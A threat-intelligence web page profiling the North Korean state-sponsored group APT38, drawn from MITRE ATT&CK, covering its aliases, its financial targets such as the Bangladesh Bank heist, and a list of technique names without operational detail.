← All Threat Actors
Threat Actor Profile

APT38

ATK 117 BeagleBoyz Bluenoroff COPERNICIUM G0082 NICKEL GLADSTONE Sapphire Sleet Stardust Chollima
▲ High Threat
[APT38](https://attack.mitre.org/groups/G0082) is a North Korean state-sponsored threat group that specializes in financial cyber operations; it has been attributed to the Reconnaissance General Bureau.(Citation: CISA AA20-239A BeagleBoyz August 2020) Active since at least 2014, [APT38](https://attack.mitre.org/groups/G0082) has targeted banks, financial institutions, casinos, cryptocurrency exchanges, SWIFT system endpoints, and ATMs in at least 38 countries worldwide. Significant operations include the 2016 Bank of Bangladesh heist, during which [APT38](https://attack.mitre.org/groups/G0082) stole $81 million, as well as attacks against Bancomext (Citation: FireEye APT38 Oct 2018) and Banco de Chile (Citation: FireEye APT38 Oct 2018); some of their attacks have been destructive.(Citation: CISA AA20-239A BeagleBoyz August 2020)(Citation: FireEye APT38 Oct 2018)(Citation: DOJ North Korea Indictment Feb 2021)(Citation: Kaspersky Lazarus Under The Hood Blog 2017) North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://attack.mitre.org/groups/G0032) instead of tracking clusters or subgroups.
Origin

Known TTPs

Data Encrypted for Impact
Process Injection
System Owner/User Discovery
Modify Registry
System Network Connections Discovery
File Deletion
Space after Filename
Keylogging
Security Software Discovery
Windows Service
Bypass User Account Control
Drive-by Compromise
File and Directory Discovery
Windows Command Shell
Deobfuscate/Decode Files or Information
Visual Basic
System Shutdown/Reboot
Malicious Link
Web Protocols
Ingress Tool Transfer
Disable or Modify Tools
Software Packing
Browser Information Discovery
Clear Windows Event Logs
Mshta
Timestomp
Disable or Modify System Firewall
Data Destruction
Brute Force
Network Share Discovery
Mark-of-the-Web Bypass
System Information Discovery
Transmitted Data Manipulation
Network Device Firewall
Disk Structure Wipe
Rename Legitimate Utilities
Prevent Command History Logging
Scheduled Task
Tool
Web Shell
Clipboard Data
Rundll32
Runtime Data Manipulation
Domains
Native API
Compiled HTML File
Malicious File
Stored Data Manipulation
Data from Local System
PowerShell
Cron
Spearphishing Attachment
Msiexec
Service Execution
Mutual Exclusion
Process Discovery

External Resources

CISA Advisories ↗

Related Intelligence

Hacking the mainframe…

LINK COPIED TO CLIPBOARD